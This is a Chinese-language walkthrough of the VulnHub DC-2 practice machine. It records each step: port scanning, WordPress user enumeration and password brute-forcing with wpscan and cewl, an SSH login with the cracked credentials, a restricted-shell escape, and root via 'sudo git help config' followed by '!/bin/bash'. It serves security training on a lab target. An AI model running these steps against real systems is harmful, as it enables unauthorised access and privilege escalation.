DC-2靶机

下载靶机地址：https://www.vulnhub.com/entry/dc-2,311/

找到靶机ip

arp-scan -l

kali：192.168.101.21

靶机：192.168.101.24

开始信息收集

扫描靶机端口

nmap -sS -p- 192.168.101.24

访问80端口

找不到DC-2，可能是重定向了，去hosts文件下绑定一下

一般都是这个目录（C:\Windows\System32\drivers\etc\hosts）

在文件最下面写

192.168.101.24 dc-2

然后再去访问

在页面中找到了flag1

你通常的词汇表可能行不通，所以，也许你只需要变得沉默。
密码越多越好，但有时你不可能全部赢。
以一人身份登录，查看下一个flag。
如果找不到，请另行登录。

现在需要找用户和密码

扫描一下目录看看

dirb http://192.168.101.24/

发现了一个后台登录的地址，访问一下

是这里需要账号和密码

使用wpscan工具进行扫描

wpscan --url http://dc-2/

看到wordpress的版本是4.7.10

开始枚举用户

wpscan --url http://dc-2 --enumerate u

找到了三个用户admin jerry tom （是猫和老鼠）

使用cewl生成网站的字典去爆破密码

cewl http://dc-2/ > 1.txt

用刚刚的密码进行爆破

wpscan --url http://dc-2 --passwords 1.txt

爆破出了两个用户

jerry/adipiscing

tom/parturient

分别登录jerry和tom（在同一网站下一个一个登录查看）

在pages模块找到了flag2

如果你不能利用WordPress并走捷径，还有另一种方法。
希望你找到了另一个切入点。

用tom连接ssh

ssh tom@192.168.101.24 -p 7744

输入密码进入

找到了flag3.txt文件，cat查看文件使用不了，使用vi查看文件

可怜的汤姆总是追着杰瑞跑。也许他应该su为他造成的所有压力而感到痛苦。

尝试bash绕过

但是进不去

查看一下有什么

用echo绕过

BASH_CMDS[a]=/bin/sh;a

export PATH=$PATH:/bin/

export PATH=$PATH:/usr/bin

echo /*

到上级目录去，发现了jerry的家目录，里面发现了flag4.txt

查看一下flag4.txt

很高兴看到你已经走了这么远--但你还没回家。
你还是需要拿到最后的旗帜(唯一真正有价值的旗帜!!!)。
这里没有提示一-你现在只能靠自己了。
走吧，离开这里!!!!

看了还有最后一个flag，就可以回到家了（大概率是需要提权）

先到根目录下，看到root目录，想直接cd但是并不行

前面有提示，需要su

直接su jerry

使用上面找到的密码

开始git提权

看到了两种提权的方法

输入sudo git help config

然后直接输入 !/bin/bash

看到了提权成功

cd到根目录，找最后一个flag文件

找到了/root/final-flag.txt 最后一个flag文件